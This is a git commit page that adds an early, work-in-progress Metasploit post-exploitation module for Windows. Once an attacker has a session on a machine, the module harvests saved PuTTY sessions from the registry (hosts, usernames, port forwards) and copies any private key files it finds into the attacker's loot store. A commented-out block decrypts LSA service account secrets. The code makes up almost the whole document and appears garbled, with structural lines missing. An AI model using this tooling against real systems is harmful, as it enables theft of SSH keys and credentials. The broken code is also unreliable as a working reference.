Initial version, working

Needs tidying up.

Current version:
* Searches for PuTTY registry keys
* Downloades the Hostname, port, private key filename, username to log in as and any port forwarding instructions
* If the private keys are accessible on the box, download them to loot

To do:
* Detect whether pageant is running or not and report back
* Tidy up code (used another plugin as a template)
Stuart Morgan 2015-05-15 16:20:46 +01:00
parent f0048b9a6d
commit f65207ac40
1 changed files with 201 additions and 0 deletions

View File

@ -0,0 +1,201 @@
# This module requires Metasploit:
# Current source:
require 'msf/core'
require 'msf/core/post/windows/priv'
require 'msf/core/post/common'
require 'msf/core/post/windows/registry'
class Metasploit3 < Msf::Post
include Msf::Post::Windows::Priv
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Windows::Registry
def initialize(info={})
'Name' => "PuTTY thing",
'Description' => %q{
This module will attempt to enumerate the LSA Secrets keys within the registry. The registry value used is:
HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\. Thanks goes to Maurizio Agazzini and Mubix for decrypt
code from cachedump.
'License' => MSF_LICENSE,
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Author' => ['Stuart Morgan <stuart.morgan[at]>']
# # Decrypted LSA key is passed into this method
# def get_secret(lsa_key)
# output = "\n"
# # LSA Secret key location within the registry
# root_regkey = "HKLM\\Security\\Policy\\Secrets\\"
# services_key = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\"
# secrets = registry_enumkeys(root_regkey)
# secrets.each do |secret_regkey|
# sk_arr = registry_enumkeys(root_regkey + "\\" + secret_regkey)
# next unless sk_arr
# sk_arr.each do |mkeys|
# # CurrVal stores the currently set value of the key. In the case
# # of services, this is usually the password for the service
# # account.
# next unless mkeys == "CurrVal"
# val_key = root_regkey + "\\" + secret_regkey + "\\" + mkeys
# encrypted_secret = registry_getvaldata(val_key, "")
# next unless encrypted_secret
# if lsa_vista_style?
# # Magic happens here
# decrypted = decrypt_lsa_data(encrypted_secret, lsa_key)
# else
# # and here
# encrypted_secret = encrypted_secret[0xC..-1]
# decrypted = decrypt_secret_data(encrypted_secret, lsa_key)
# end
# next unless decrypted.length > 0
# # axe all the non-printables
# decrypted = decrypted.scan(/[[:print:]]/).join
# if secret_regkey.start_with?("_SC_")
# # Service secrets are named like "_SC_yourmom" for a service
# # with name "yourmom". Strip off the "_SC_" to get something
# # we can lookup in the list of services to find out what
# # account this secret is associated with.
# svc_name = secret_regkey[4,secret_regkey.length]
# svc_user = registry_getvaldata(services_key + svc_name, "ObjectName")
# # if the unencrypted value is not blank and is a service, print
# print_good("Key: #{secret_regkey}\n Username: #{svc_user} \n Decrypted Value: #{decrypted}\n")
# output << "Key: #{secret_regkey}\n Username: #{svc_user} \n Decrypted Value: #{decrypted}\n"
# else
# # if the unencrypted value is not blank, print
# print_good("Key: #{secret_regkey}\n Decrypted Value: #{decrypted}\n")
# output << "Key: #{secret_regkey}\n Decrypted Value: #{decrypted}\n"
# end
# end
# end
# return output
# end
def get_saved_session_details(sessions)
all_sessions = []
sessions.each do |ses|
newses = {}
newses['Name'] = Rex::Text.uri_decode(ses)
INTERESTING_KEYS.each do |key|
newses[key] = registry_getvaldata("HKCU\\Software\\SimonTatham\\PuTTY\\Sessions\\#{ses}", key).to_s
all_sessions << newses
def report(info)
# Results table holds raw string data
results_table =
'Header' => "PuTTY Saved Sessions",
'Indent' => 1,
'SortIndex' => -1,
'Columns' => ['Name'].append(INTERESTING_KEYS).flatten
info.each do |result|
row = []
row << result['Name']
INTERESTING_KEYS.each do |key|
row << result[key]
results_table << row
print_line results_table.to_s
#stored_path = store_loot('ad.computers', 'text/plain', session, results_table.to_csv)
#print_status("Results saved to: #{stored_path}")
def grab_private_keys(sessions)
sessions.each do |ses|
filename = ses['PublicKeyFile'].to_s
next if filename.empty?
if file?(filename)
ppk = read_file(filename)
stored_path = store_loot('putty.ppk.file', 'text/plain', session, ppk)
print_status("PuTTY private key file for \'#{ses['Name']}\' (#{filename}) saved to: #{stored_path}")
print_error("PuTTY private key file for \'#{ses['Name']}\' (#{filename}) could not be found.")
# The sauce starts here
def run
# Look for saved sessions, break out if not.
saved_sessions = registry_enumkeys('HKCU\\Software\\SimonTatham\\PuTTY\\Sessions')
if saved_sessions.nil? || saved_sessions.empty?
print_error('No saved sessions found')
# Tell the user how many sessions have been found (with correct English)
print_status("Found #{saved_sessions.count} session#{saved_sessions.count>1?'s':''}")
# Retrieve the saved session details & print them to the screen in a report
all_saved_sessions = get_saved_session_details(saved_sessions)
# If the private key file has been configured, retrieve it and save it to loot
print_status("Downloading private keys...")
# hostname = sysinfo['Computer']
# print_status("Executing module against #{hostname}")
# print_status('Obtaining boot key...')
# bootkey = capture_boot_key
# vprint_status("Boot key: #{bootkey.unpack("H*")[0]}")
# print_status('Obtaining Lsa key...')
# lsa_key = capture_lsa_key(bootkey)
# if lsa_key.nil?
# print_error("Could not retrieve LSA key. Are you SYSTEM?")
# return
# end
# vprint_status("Lsa Key: #{lsa_key.unpack("H*")[0]}")
# secrets = hostname + get_secret(lsa_key)
# print_status("Writing to loot...")
# path = store_loot(
# 'registry.lsa.sec',
# 'text/plain',
# session,
# secrets,
# 'reg_lsa_secrts.txt',
# 'Registry LSA Secret Decrypted File'
# )
# print_status("Data saved in: #{path}")